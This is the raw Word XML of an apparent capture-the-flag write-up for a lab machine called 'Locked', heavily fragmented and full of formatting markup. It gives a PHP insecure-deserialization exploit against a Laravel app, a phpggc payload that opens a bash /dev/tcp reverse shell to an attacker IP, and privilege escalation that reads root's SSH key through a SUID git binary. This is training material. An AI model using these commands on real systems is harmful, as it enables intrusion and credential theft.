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v0vgupcemm9q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74w97yh3mtsm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write-up refers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Locked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machine. If you need support, please open a ticket in the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support channel on the Discord server.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80" w:lineRule="auto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7mlny5c2vtd1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Reconnaissance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Initial enumeration of the machine was performed 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with the objective of identifying open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ports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on the target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--min-rate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-sVC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-vvv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87500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Through Nmap, two open ports were identified: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80/tcp (HTTP)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22/tcp (SSH)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On port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an active web service was identified.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68600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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registering in the application, a redirect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/secrets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route was identified. This route provides functionality for storing sensitive information such as notes and credentials.</w:t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594100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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63800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Using the browser developer tools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(F12)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it was possible to identify the application’s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cookies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Among them,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laravel_session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cookie stood out, indicating that the application was developed using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Laravel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framework.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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55700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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decoding the cookie from Base64, the standard Laravel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serialization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format was identified, containing the fields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iv, value, mac, and tag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This pattern is compatible with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Laravel 5.5+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up to recent versions. The absence of a value in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field indicates the use of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AES-256-CBC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encryption algorithm instead of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AES-GCM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C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yJpdiI6InZ3WFdWYytQOFNTRUZFdEdmbklqRnc9PSIsInZhbHVlIjoiZGgrMUd5VW9MRXBYL1lVdldOc1BQNnRKZ0lhK1gxTVN4bVVuOU02SitBdU5oQzlmZjhIN0l3aDk3djJ6c3lobmc5bGpMZHBkVUpIaWtvOHhzak04V1paTDlvR2tpS3NIWmVFRUxRcUE0cjBBRXlBVE9KdjB0TEY4OHNET0VOQnoiLCJtYWMiOiIwYjUzNzUyZjNlNGRlMjNhNDhlMjI1M2YzMDk0ODc2Y2ViMDU3Yjk0NjhlYTYxZDQyNGNiODc5OWQ1NDI4N2ZiIiwidGFnIjoiIn0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base64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-d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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{"iv":"vwXWVc+P8SSEFEtGfnIjFw==","value":"dh+1GyUoLEpX/YUvWNsPP6tJgIa+X1MSxmUn9M6J+AuNhC9ff8H7Iwh97v2zsyhng9ljLdpdUJHiko8xsjM8WZZL9oGkiKsHZeEELQqA4r0AEyATOJv0tLF88sDOENBz","mac":"0b53752f3e4de23a48e2253f3094876ceb057b9468ea61d424cb8799d54287fb","tag":""}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596900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.rdbe7u52a08r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Exploitation – Obtaining the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 addition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laravel_session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cookie, the application also uses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token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called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user_session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546100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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decoded from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Base64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user_session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token reveals a serialized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PHP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object containing information related to the authenticated user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029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"TzoyMzoiQXBwXFN1cHBvcnRcU2Vzc2lvbkRhdGEiOjM6e3M6NjoidXNlcklkIjtpOjE7czo1OiJlbWFpbCI7czoxNToidGVzdGVAdGVzdGUuY29tIjtzOjQ6Im5hbWUiO3M6NToidGVzdGUiO30="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base64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-d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B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O:23:"App\Support\SessionData":3:{s:6:"userId";i:1;s:5:"email";s:15:"teste@teste.com";s:4:"name";s:5:"teste";}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42900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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behavior indicates that the application performs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server-side data serialization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and, consequently, may execute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unserialize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operations on the contents of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user_session token.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This practice exposes the application to a potential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PHP insecure deserialization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vulnerability, allowing manipulation of serialized objects controlled by the user.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validate the existence of the vulnerability, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId16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phpgcc</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1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 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ptool was used to generate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serialized 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object containing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gadget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chain capable of executing a curl command directed to the attacker’s machine, allowing confirmation of the insecure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deserialization flaw.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PAYLOAD=$(./phpggc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Laravel/RCE9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&lt;vpn-ip&gt;"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base64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"Cookie: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user_session=$PAYLOAD"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http://&lt;machine-ip&gt;/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http.server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057400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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request was received by the attacker’s server, confirming execution of the payload and validating the existence of the insecure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deserialization vulnerability.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From this point onward, exploitation of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insecure deserialization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vulnerability allowed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remote command execution,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enabling establishment of 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reverse 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on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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PAYLOAD=$(./phpggc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Laravel/RCE9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"/bin/bash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/dev/tcp/&lt;vpn-ip&gt;/443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0&gt;&amp;1'"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base64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"Cookie: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user_session=$PAYLOAD"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http://&lt;machine-ip&gt;/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30400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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erse connection was successfully established on port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443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resulting in remote access to the system as the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www-data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within the context of the web application.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obtained shell was stabilized into an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interactive TTY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allowing reliable command execution on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045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ctr+z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-echo;fg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12900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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user flag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is located in the root directory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76300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3ybadllu1h08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Privilege Escalation – Obtaining the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find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command, enumeration of binaries with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SUID bit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set was performed, allowing identification of executables that run with root privileges. During this analysis, it was identified that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git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binary has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SUID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bit enabled.</w:t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-perm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-4000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2&gt;/dev/null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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Since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git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binary executes with root privileges due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SUID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bit, it was possible to access restricted files in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directory, including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/root/.ssh/id_rsa.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hyperlink r:id="rId23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https://gtfobins.github.io/gtfobins/git/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diff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/root/.ssh/id_rsa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65500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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possession of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user’s private key, it was possible to establish an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SSH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connection with administrative privileges on the target system.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chmod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root@&lt;machine-ip&gt;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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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50900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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 flag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is located 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/root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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584200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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8" w:type="default"/>
      <w:headerReference r:id="rId29" w:type="first"/>
      <w:headerReference r:id="rId30" w:type="even"/>
      <w:footerReference r:id="rId31" w:type="default"/>
      <w:footerReference r:id="rId32" w:type="first"/>
      <w:footerReference r:id="rId33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widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18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|All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                         Page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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.fjodndbx57tm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-866770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50" name="image20.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image20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E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rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark2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19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-942970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4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5679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="4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Locked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5679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="48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86550" cy="301567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9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3.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/gi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16.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml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eader" Target="header2.xm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6.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ambionics/phpggc" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ambionics/phpggc" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId1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0.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19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bb6SvbOCbipMLhgN8vG0vieN/Q==">CgMxLjAyDmgudjB2Z3VwY2VtbTlxMg5oLjc0dzk3eWgzbXRzbTIOaC43bWxueTVjMnZ0ZDEyDmgucmRiZTd1NTJhMDhyMg5oLjN5YmFkbGx1MWgwODIOaC5mam9kbmRieDU3dG04AHIhMWRiQ3hzZkNWQlNud0NlamxUYm5sT3Btd0w4MnB1ZkM1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